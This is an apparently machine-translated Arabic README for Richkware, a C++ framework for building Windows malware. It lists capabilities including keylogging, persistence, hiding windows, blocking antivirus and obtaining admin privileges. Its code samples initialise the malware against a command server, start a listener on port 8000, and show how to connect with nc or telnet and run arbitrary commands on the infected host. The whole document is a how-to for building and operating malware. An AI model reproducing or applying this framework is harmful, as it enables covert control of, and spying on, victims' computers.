Richkware

إطار لبناء برامج Windows الخبيثة ، مكتوبة في C ++.

RichKware هي مكتبة من وظائف الشبكة و OS ، والتي يمكنك استخدامها لإنشاء برامج ضارة. يسمح تكوين هذه الوظائف بالتطبيق لتولي السلوكيات التي يمكن الرجوع إلى الأنواع التالية من البرامج الضارة:

• فايروس
• الديدان
• بوت
• برامج التجسس
• Keylogger
• Scareware

Richkware-Manager-Server: خدمة لإدارة المضيفين التي توجد فيها مثيل للبرامج الضارة التي تم تطويرها باستخدام Richkware Framework.

Richkware-Manager-Client: عميل Richkware-Manager-Server ، أنه يحصل على قائمة جميع المضيفين من الخادم ويمكنه إرسال أي نوع من الأوامر إليهم.

• Server ( network.h ): وحدة لإدارة خادم متعدد الخيوط ، والتي تسمح باستلام الأوامر من الإنترنت (Richkware-Manager-Colient أو وحدة التحكم) وفقًا للبروتوكول المحدد.
  • بروتوكول ( بروتوكول. هـ ):
    1. تنفيذ الأوامر عن بعد (المعرف 1)
    2. (العمل قيد التقدم)
• الشبكة ( Network.H ):
  • RawRequest : أرسل طلبًا إلى خادم ؛
  • UploadInfotorichkwaremanagerserver : أرسل معلومات إلى Richkware-Manager-Server

• التخزين ( Storage.H ):

  • Savesession and Tovsession : حفظ حالة التطبيق (مشفرة) إلى:
    • التسجيل (SaveValuereg و LoadValuereg)
    • ملف (SaveValuetofile و LoadValueFromFile)
  • الثبات : تثبيت نفسه بشكل دائم في النظام.

• isadmin و requestAdMinprivileges ( Richkware.H ): تحقق وتطلب امتيازات المسؤول ؛

• Stealthwindow ( Richkware.H ): إخفاء التطبيقات ؛

• OpenApp ( Richkware.H ): تطبيقات تعسفية مفتوحة ؛

• KeyLogger ( RichKware.H ): المتاجر في ملف جميع المفاتيح المضغوطة ؛

• blockapps e unblockapps ( blockapps.h ): تطبيقات كتلة وإلغاء حظرها (مكافحة الفيروسات ، ...).

• تشفير وفك التشفير ( crypto.h ): RC4 (افتراضي) ، Blowfish.
• encode and decode ( crypto.h ): base64 (defualt) ، hex.

• Randmouse ( Richkware.H ): حرك بشكل عشوائي مؤشر الماوس ؛
• السبات ( Richkware.H ): نظام السبات.

هذه هي المتطلبات الأساسية لبناء واستخدام Richkware:

• صنع أو cmake
• Mingw

افتح main.cpp ، وإنشاء مثيل من Richkware.

إذا قمت بنشر RMS ، يمكنك تهيئة البرامج الضارة على النحو التالي:

    int main() {
           Richkware richkware("Richk","DefaultPassword","192.168.99.100", "8080", "associatedUser");
            ...
            return 0;
        }

أنه يحصل على مفتاح آمن من Richkware-Manager-Server ويقوم بتعيين المفتاح كمفتاح تشفير. يتم استخدام DefaultPass كمفتاح تشفير مؤقت لضمان اتصال آمن مع RMS ، وإذا لم تتمكن البرامج الضارة من الوصول إلى RMS للحصول على KET التشفير ، فسيستخدم DefaultPass كمفتاح تشفير.

خلاف ذلك ، إذا لم تنشر RMS ، فيمكنك استخدام:

 Richkware richkware("Richk","richktest");

وبهذه الطريقة ، يستخدم "Richktest" كمفتاح تشفير.

بعد تطبيق Main.cpp ، يمكنك التجميع على النحو التالي.

 make

• C/C ++> Preprocessor> تعريفات مسبق ، أضف "_crt_secure_no_warnings"
• رابط> الإدخال> تبعيات إضافية ، أضف "WS2_32.lib"

في المثال التالي ، نسمي " خادم " ، برامج ضارة تم تطويرها باستخدام Richkware Framework والتي تم تمكينها من الوظيفة لإنشاء خادم ، و " عميل " ، المبدع (المتسلل) للبرامج الضارة التي تحاول إنشاء اتصال بالكمبيوتر المصاب.

وظيفة Call Framework startserver in the Main ، تبدأ الخادم على المنفذ ، في المثال التالي هو منفذ TCP 8000. تذكر أنه إذا تم استخدام منفذ بالفعل بواسطة برنامج آخر ، فلا يمكنك استخدام هذا المنفذ ، حتى يتم إيقاف البرنامج.

 int main () {
    ...
	richkware.network.server.Start("8000");
    ...
}

في جميع الأنظمة التي يتم فيها تثبيت الجهاز الظاهري Java ، يمكنك استخدام Richkware-Manager-Client ، وإلا إذا لم يكن موجودًا ، فيمكنك استخدام محطة بسهولة.

في أنظمة UNIX ، يمكنك استخدام Netcat ، وتشغيل الأمر التالي:

 nc <serverName> 8000

إذا تلقى الخادم الطلب على المنفذ المفتوح ونجح في إنشاء اتصال ، فإنه يستجيب للعميل يؤكد إنشاء الاتصال ، بعد ذلك ، يمكنك الكتابة:

 [[1]]COMMAND

عندما يكون الأمر أمرًا يجب تنفيذه على المضيف المصاب حيث يتم تشغيل الخادم.

في Windows ، يمكنك استخدام Telnet ، بنفس الطريقة:

 telnet <serverName> 8000

...

 [[1]]COMMAND